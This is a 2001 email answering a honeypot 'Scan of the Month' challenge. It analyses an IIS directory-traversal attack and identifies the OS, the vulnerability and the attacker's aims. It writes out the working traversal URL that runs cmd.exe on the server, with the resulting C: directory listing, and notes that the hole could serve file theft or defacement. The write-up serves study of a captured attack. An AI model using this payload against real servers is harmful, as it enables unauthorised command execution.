From ndesai01@tampabay.rr.com Mon Feb 19 23:08:51 2001
Date: Mon, 19 Feb 2001 22:35:11 -0500
From: Neil Desai
To: Lance Spitzner
Subject: Entry for February Scan of the Month

Here are my thoughts on the attack:

### QUESTION 1: What is the operating system of the honeypot, how do you know?

The OS is Windows NT4 Server with IIS4 or Windows 2K with IIS5. This is given away by "GET /msadc/....../....../....../winnt/system32?". The "msadc" directory is installed by default with IIS4 as part of the default web site. It points to "(system drive)\Program Files\Common Files\system\msadc\". You can also tell by the output from the "dir c:\".

### QUESTION 2: What is the name of this attack?

It is the "Web Server File Request Parsing" vulnerability and it is MS00-086. The basic problem is the way that IIS handles executables. Normally you should only be able to request the actual executable, but IIS allows you to also send any associated commands or switches for the executable as well. This allows for many different avenues of attack to the web server.

### QUESTION 3: What is the attack attempting to accomplish?

To issue commands to the underlying OS. In this case the attacker is issuing "dir c:\" and wants to look at the contents of "C:\". By looking at the information that was sent back to the attacker, they can easily tell that the web root is on the same drive as the OS. The attacker could also use it to start an FTP session from the web server to his/her machine to get files that would then be used for other things. The attacker could also redirect text to the homepage of the web server to deface the site.

The attacker is using a Windows95 box with IE5.0 (User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows95)..). The attacker is "lib.bvxttrip.org".

This is my assumption of what the user did:

1. Go to the main page of the web site.
2. Type the following in the URL line in the web browser after getting to the main page (minus the quotes): "172.16.0.106/msadc/....../....../....../winnt/system32/cmd.exe?/c+dir+c:\"

This got them the output:

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Tue, 26 Dec 2000 13:05:30 GMT
    Connection: close
    Content-Type: application/octet-stream

     Volume in drive C has no label.
     Volume Serial Number is 8403-6A0E

     Directory of c:\

    11/26/00  12:34p                     0 AUTOEXEC.BAT
    11/26/00  06:57p                   322 boot.ini
    11/26/00  12:34p                     0 CONFIG.SYS
    12/07/00  03:30p        <DIR>          InetPub
    12/07/00  03:12p        <DIR>          Multimedia Files
    12/20/00  05:13p            78,643,200 pagefile.sys
    12/21/00  08:59p        <DIR>          Program Files
    12/21/00  08:59p        <DIR>          TEMP
    12/20/00  05:14p        <DIR>          WINNT
                   9 File(s)     78,643,522 bytes
                              1,779,191,808 bytes free

Most of the data in the capture is generated by the web browser and is irrelevant to the actual attack.